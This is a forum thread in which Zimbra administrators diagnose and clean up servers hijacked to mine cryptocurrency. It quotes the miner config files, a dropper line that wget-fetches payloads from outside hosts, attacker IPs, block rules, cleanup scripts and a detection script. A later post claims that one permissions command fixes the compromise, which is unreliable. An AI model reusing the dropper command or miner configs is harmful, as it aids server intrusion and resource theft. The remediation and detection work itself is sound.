Thread: cpu usage for ltsys command

  #1 massspec (Starter Member, joined Jan 2014)

    cpu usage for ltsys command

    Has anyone ever seen CPU usage for the ltsys command? top shows two PIDs from user zimbra at >100% CPU for the ltsys command. I can't find any reference to ltsys in the Zimbra forum or from a general Google search. Any help is appreciated.

  #2 purepages (New Member, joined Jan 2014)

    I am seeing the exact same thing! I see the following in the /tmp folder: ltsys.cfg, zsys.cfg, fsys.cfg

    root@zimbra:/tmp# more ltsys.cfg
    {
    "url" : "stratum+tcp://ltc.give-me-coins.com:3333",
    "user" : "doodermcpooter.boss",
    "pass" : "b0ss",
    "quiet" : true
    }
    root@zimbra:/tmp# more zsys.cfg
    {
    "url" : "stratum+tcp://ltc.give-me-coins.com:3333",
    "user" : "c0denam3_vlad.sphy",
    "pass" : "Q0qLmgY5zoi",
    "quiet" : true
    }
    root@zimbra:/tmp# more fsys.cfg
    {
    "url" : "stratum+tcp://ftc.give-me-coins.com:3336",
    "user" : "c0denam3_vlad.ftc",
    "pass" : "ftc",
    "quiet" : true
    }

    Looks like it has been hacked somehow...

  #3 phoenix (Zimbra Consultant & Moderator, Vannes, France, joined Sep 2005)

    There's a total lack of information in your posts that describes the exact problem, no indication of the Zimbra version you're using (you should always post the output of the command "zmcontrol -x") and no indication that you've done any research on the problem. Have either of you seen these forum Announcements:

    Critical Security Vulnerability Addressed in 7.2.6/8.0.6 Maintenance Releases
    Critical Security Patches posted for 8.0.X/7.2.X
    Regards

    Bill

  #4 purepages (New Member, joined Jan 2014)

    Hello Bill,

    Thank you for your response. This was the only post that I came across in my 'research of the problem'. The exact problem we are having is that our CPUs are pegged at 100% with this unknown process. Today the process is:

    PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
    30824 zimbra 20 0 199m 2932 972 S 349 0.0 1474:48 /tmp/zhelper -B -c /tmp/zhelper.cfg

    Yesterday I deleted everything from the /tmp folder and today I have the following again:

    zimbra@zimbra:/tmp$ ls
    hsperfdata_root hsperfdata_zimbra ltsys.cfg zhelper.cfg z.sh

    The contents of the files are as posted above. What I am trying to figure out is how these are being placed here and executed. Zimbra is the only thing running on this server and the process is running as the Zimbra user so I believe it is an exploit of zimbra. SSH to this server is blocked by a firewall so I am quite certain it has not been compromised in that way. The output of zmcontrol -x is as follows:

    zimbra@zimbra:/tmp$ zmcontrol -x
    Unknown option: x
    Release 8.0.6.GA.5922.UBUNTU10.64 UBUNTU10_64 NETWORK edition.

    Thanks and regards,

    Al.

  #5 phoenix (Zimbra Consultant & Moderator, Vannes, France, joined Sep 2005)

    It is quite likely this hack was done before your upgrade to 8.0.6, there are also several other threads in the forums on this subject. I'd suggest you go to the support portal and take a look at some of the information that relates to this problem.
    Regards

    Bill

  #6 BobyMike (New Member, joined Jan 2014)

    Hi Guys, Hi phoenix,

    First of all, I understand that the Zimbra team is under heavy pressure regarding this, but this is no reason to be so lacking in your answers. I've been hacked too, for 4 weeks now, by exactly the same hackers mentioned below. I searched and found on the forum that we have to upgrade to the latest version of Zimbra, but there was no tutorial, no step-by-step guide on how to remove the threat after we upgraded. The result? Even though I upgraded first to 7.2.6 and then to 8.0.6, the hackers still played with my server. I didn't see any answer from the Zimbra team telling us how they managed to hack your systems and expose our servers! So please, be so kind and explain at least to the people (eventually with a good link or examples, not like the one you posted, "the command "zmcontrol -x"", which is nothing!). Not all of us are experts... if we were, we'd work for Zimbra.

    So, regarding the hacking problem, I will try to explain what I did, step by step:
    1. First of all, I saved all the logs for the authorities.
    2. You will have to kill all the processes, for example: killall -9 dsys
    3. You will have to check these .cfg files to see the addresses they point to. Mainly they point to give-me-coins.com subdomains. Also, you will find in your /tmp files with the extension .sh (example: z.sh, d.sh, e.sh) and if you look inside them you will see: wget -q http://abksprings.co.za; http://123.30.29.24/ .
    ltc.give-me-coins.com - 66.85.187.134
    ftc.give-me-coins.com - 66.85.142.21
    mining.eu.hypernova.pw - 176.31.160.68
    ltc-eu.give-me-coins.com:3333 - 66.85.187.133
    mega.give-me-coins.com:80 - 198.15.127.246
    btc.give-me-coins.com:3335 - 66.85.187.132
    btc-eu.give-me-coins.com:3335 - 66.85.142.20

    4. Block these addresses at your firewall (it is best if the firewall is not on the same server):
    # Same hosts as the rules originally posted here, applied in a loop.
    # The original rules matched every chain on the source address (-s);
    # for OUTPUT, and for FORWARD traffic leaving your network, the pool
    # is the destination, so -d is needed or the miner's outbound
    # connections are not blocked. -I places each rule ahead of any
    # existing ACCEPT rule in the chain.
    for ip in 66.85.142.21 162.159.247.189 66.85.187.134 176.31.160.68 \
              66.85.187.133 198.15.127.246 66.85.187.132 66.85.142.20 \
              205.234.130.123 123.30.29.24 76.25.244.111; do
        /usr/sbin/iptables -I INPUT   -s "$ip" -j REJECT
        /usr/sbin/iptables -I OUTPUT  -d "$ip" -j REJECT
        /usr/sbin/iptables -I FORWARD -s "$ip" -j REJECT
        /usr/sbin/iptables -I FORWARD -d "$ip" -j REJECT
    done

    5. Create an executable script and run it with cron every minute:
    #!/bin/sh
    # Kills the miner binaries named in this thread (dsys was in step 2
    # but missing from the original kill list) and removes them and the
    # dropper scripts from /tmp.
    for p in dsys fsys ltsys kpoll zsys zhelper; do
        killall -9 "$p" 2>/dev/null
        rm -rf "/tmp/$p"
    done
    # This also removes Zimbra's own scheduled jobs (log processing,
    # backups); "crontab -u zimbra -l" shows what is there before it goes.
    crontab -u zimbra -r
    find /tmp -type f -name "*.sh" -exec rm -f {} \;

    6. Remove from /opt/zimbra/zimlets-deployed the following two: /com_zimbra_example_simplejspaction and /com_zimbra_example_simplejspaction2
    7. Check for any new accounts that were created and delete them if they seem suspicious:
    su zimbra
    zmaccts (it will help you see the date they were created)

    8. Restart your server.
    9. Change your LDAP and MySQL passwords:
    su zimbra
    zmldappasswd -r LDAP-root-password
    zmldappasswd LDAP-zimbra-password
    zmmypasswd --root mySQL-root-password
    zmmypasswd mySQL-zimbra-password
    (or better, look here: Resetting LDAP and MySQL Passwords - Zimbra :: Wiki )

    I hope this is all... at least this is what I have done so far, and it seems there is no activity on my server anymore. But I am not sure. What I've done is only to block these guys; I don't know if my server is safe now. Perhaps somebody from the Zimbra team will advise further.

    best regards,
    BM.
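The indicators scattered across posts #2, #4 and #6 (stratum+tcp pool URLs in /tmp/*.cfg, *.sh droppers that wget a payload, a binary running out of /tmp as the zimbra user, the two example zimlets, and the zimbra crontab) can be checked in one pass before anything is deleted. The script below is an added example written for this page; it is not code from the thread, from Zimbra, or from any of the posters. It only reports, so it can be run repeatedly and its output kept with the logs from step 1. The directory arguments default to /tmp and /opt/zimbra/zimlets-deployed, the paths the posts name; the --demo mode builds a constructed fixture (files shaped like the ones quoted above, not real captured data) so the script can be exercised offline.

```shell
#!/bin/sh
# Triage helper for the indicators described in this thread (added example,
# not the thread's or Zimbra's code). Reports without deleting anything.
set -u

# Pool endpoints from dropped miner configs: unique host:port, one per line.
miner_pools() {
    grep -rhoE 'stratum[+]tcp://[^"[:space:]]+' "$1" 2>/dev/null \
        | sed 's#^stratum+tcp://##' | sort -u
}

# Dropper scripts: *.sh files in the directory that call wget or curl.
dropper_scripts() {
    grep -lE '(wget|curl)[[:space:]]' "$1"/*.sh 2>/dev/null
    return 0
}

# Live processes whose executable lives under the directory. readlink keeps
# the " (deleted)" suffix, so a binary removed after launch is still caught.
procs_from_dir() {
    for p in /proc/[0-9]*; do
        exe=$(readlink "$p/exe" 2>/dev/null) || continue
        case "$exe" in
            "$1"/*) echo "${p#/proc/} $exe" ;;
        esac
    done
}

# Persistence named in step 6: the two example zimlets.
suspicious_zimlets() {
    for z in com_zimbra_example_simplejspaction com_zimbra_example_simplejspaction2; do
        [ -e "$1/$z" ] && echo "$1/$z"
    done
    return 0
}

# Zimbra's own crontab is long and legitimate; only lines touching /tmp are shown.
zimbra_cron_tmp() {
    crontab -u zimbra -l 2>/dev/null | grep '/tmp'
    return 0
}

triage() {
    tmpdir=${1:-/tmp}
    zimlets=${2:-/opt/zimbra/zimlets-deployed}
    miner_pools "$tmpdir"         | sed 's/^/pool:    /'
    dropper_scripts "$tmpdir"     | sed 's/^/dropper: /'
    procs_from_dir "$tmpdir"      | sed 's/^/proc:    /'
    suspicious_zimlets "$zimlets" | sed 's/^/zimlet:  /'
    zimbra_cron_tmp               | sed 's/^/cron:    /'
}

# Constructed fixture (not real captured files): a directory shaped like the
# /tmp listing in post #4, with the ltsys.cfg/fsys.cfg contents from post #2,
# a one-line dropper, and one of the two zimlet directories from step 6.
make_fixture() {
    d=$(mktemp -d)
    printf '%s\n' '{' \
        '"url" : "stratum+tcp://ltc.give-me-coins.com:3333",' \
        '"user" : "doodermcpooter.boss",' '"pass" : "b0ss",' '"quiet" : true' '}' \
        > "$d/ltsys.cfg"
    printf '%s\n' '{' \
        '"url" : "stratum+tcp://ftc.give-me-coins.com:3336",' \
        '"user" : "c0denam3_vlad.ftc",' '"pass" : "ftc",' '"quiet" : true' '}' \
        > "$d/fsys.cfg"
    echo 'wget -q http://123.30.29.24/' > "$d/z.sh"
    : > "$d/hsperfdata_zimbra"
    mkdir -p "$d/zimlets/com_zimbra_example_simplejspaction"
    echo "$d"
}

# Usage: sh zimbra-triage.sh --live [tmpdir] [zimlets-dir]   (run as root)
#        sh zimbra-triage.sh --demo                          (fixture only)
case "${1:-}" in
    --demo) d=$(make_fixture); triage "$d" "$d/zimlets"; rm -rf "$d" ;;
    --live) triage "${2:-}" "${3:-}" ;;
    *)      ;;
esac
```

In --demo mode the output is two pool: lines (ftc and ltc give-me-coins endpoints), one dropper: line for z.sh and one zimlet: line; proc: and cron: lines appear only on a live host that actually has a /tmp binary running or a /tmp reference in the zimbra crontab. Because procs_from_dir reads /proc rather than parsing ps or top, it also catches a miner whose binary was unlinked after it started, which a plain ls of /tmp would miss.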

  #7 purepages (New Member, joined Jan 2014)

    Thank you BM for the detailed description. You are correct - this does not seem to be as clearly documented in the other threads. I have completed these steps and also see that the activity is gone away.

    Thank you to everyone for your responses here!

  #8 bhelrajesh (Starter Member, joined Feb 2014)

    Hi BobyMike,

    The command below will solve all the above issues, no need to do all of the above, my friend:
    /opt/zimbra/libexec/zmfixperms --verbose --extended
    In my case it works very well.
